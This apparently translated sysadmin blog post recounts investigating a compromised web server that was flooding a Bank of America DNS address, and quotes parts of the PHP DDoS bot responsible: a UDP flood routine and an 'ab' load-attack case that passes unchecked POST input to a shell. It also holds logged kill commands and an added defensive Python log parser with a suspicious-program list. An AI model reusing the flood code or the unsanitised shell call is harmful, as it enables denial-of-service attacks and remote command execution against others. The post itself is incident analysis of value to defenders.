Today, at about two o'clock in the morning, just as I wanted to go to bed, one of my acquaintances wrote to me on Skype. Last year I helped him administer several of his servers. At that late hour he wrote that, judging by the MRTG graph, the network interface of one of his servers was completely saturated. I looked: indeed, I could not even get in over ssh. The server was rebooted and the analysis of the situation began...

Analysis of the situation
After the reboot, the traffic reappeared after a while. I launched iptraf, and it showed a large number of UDP packets going to a single IP address, 171.161.224.16. When I resolved it to dns5.bankofamerica.com, everything fell into place: apparently a DDoS was being launched from the server.
I banned the IP in iptables. Looking at top, one of the httpd processes was consuming 100% CPU; I attached strace to it and saw the same familiar address. Since there is no access_log on the server and the error_log was empty, I turned to the logs of the excellent PHP module baxtep (article on Habr), which logs every attempt to execute a command through the PHP interpreter. I built an RPM of it and always install it on the servers, precisely for a case like this. The name of the offending script was obvious at a glance:
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-bin` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-cgi` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
The code of the file is available at the link. I found it on Google by the string itsoknoproblembro from the file; Google returns only one result, so I decided it was fresh and worth writing up on Habr.
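As an added example (not code from the original post), here is a small parser for the baxtep log format shown above, which groups the logged commands by the PHP file that issued them and flags scripts that run process killers or load generators. The line layout is assumed from the three lines above, and the sample log is constructed, including the non-suspicious thumb.php entry.

```python
import os
import re
from collections import defaultdict

# Constructed sample in the BAXTEP log format shown above (not from the
# original post); paths, times and URLs are made up.
SAMPLE_LOG = """\
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-bin` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:47:01 BAXTEP: system CMDLINE: `/usr/bin/ab -c 100 -n 100000 http://example.invalid/` FILE: /home/user/site/htdocs/dir/db/indx.php on line 40 URI: /dir/db/indx.php
2012-01-12 22:50:10 BAXTEP: exec CMDLINE: `convert in.jpg -resize 50% out.jpg` FILE: /home/user/site/htdocs/gallery/thumb.php on line 12 URI: /gallery/thumb.php
"""

# Assumed layout: "<date> <time> BAXTEP: <func> CMDLINE: `<cmd>` FILE: <path> on line <n> URI: <uri>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) BAXTEP: (?P<func>\w+) "
    r"CMDLINE: `(?P<cmd>.*)` FILE: (?P<file>\S+) on line (?P<line>\d+) URI: (?P<uri>\S+)$"
)

# Programs a web script has no legitimate reason to launch: process killers
# and load generators, as used by the bot described in this post.
SUSPICIOUS_PROGRAMS = {"killall", "pkill", "kill", "ab"}


def parse_line(line):
    """Parse one BAXTEP line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_scripts(log_text):
    """Return {php_file: [command, ...]} for files that ran a suspicious program."""
    hits = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        argv = rec["cmd"].split()
        # Compare on the basename so /usr/bin/ab is treated the same as ab.
        program = os.path.basename(argv[0]) if argv else ""
        if program in SUSPICIOUS_PROGRAMS:
            hits[rec["file"]].append(rec["cmd"])
    return dict(hits)


if __name__ == "__main__":
    for path, cmds in suspicious_scripts(SAMPLE_LOG).items():
        print(path, "->", cmds)
```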
Code analysis
The file is only 3 KB and the code is not complicated. The main features of the bot:
- uploading files to the server
- DDoS with a large number of UDP packets
- DDoS via the ab utility
I will dwell in more detail on the DDoS part.
    case "ust":
        $page = curPageURL();
        $ip = $_POST['ip'];
        $port = "11";
        $out = $page."\n";
        $socket = stream_socket_client("udp://$ip:$port");
        if ($socket) {
            stream_set_write_buffer($socket, 0);
            stream_socket_sendto($socket, $out);
        }
        fclose($socket);
        break;
The script receives the address of the target through a POST parameter, opens a UDP socket and, as long as the socket exists, sends packets to port 11. Interestingly, as the payload it sends its own address, the URL of the script itself:
    function curPageURL() {
        $pageURL = 'http';
        if ($_SERVER["HTTPS"] == "on") {
            $pageURL .= "s";
        }
        $pageURL .= "://";
        if ($_SERVER["SERVER_PORT"] != "80") {
            $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
        } else {
            $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
        }
        return $pageURL;
    }
The question "Why?" has not left my head for 12 hours.
The second attack method is via the ab utility:
    case "ab":
        $url = $_POST['url'];
        $c = $_POST['c'];
        $n = $_POST['n'];
        cmdexec("ab -c $c -n $n $url");
        break;
Moreover, there are no checks on the incoming parameters at all, so arbitrary commands can be executed on the server.
I had not personally encountered UDP DDoS in PHP before, and nobody had flooded us with it. I googled it, and apparently people have been practising this for a long time in various flavours.
Findings
- As practice has shown, such a script easily saturates the entire available channel.
- The situation became possible because outgoing UDP was not paranoidly filtered on the server.
- Someone decided to take on BoA :)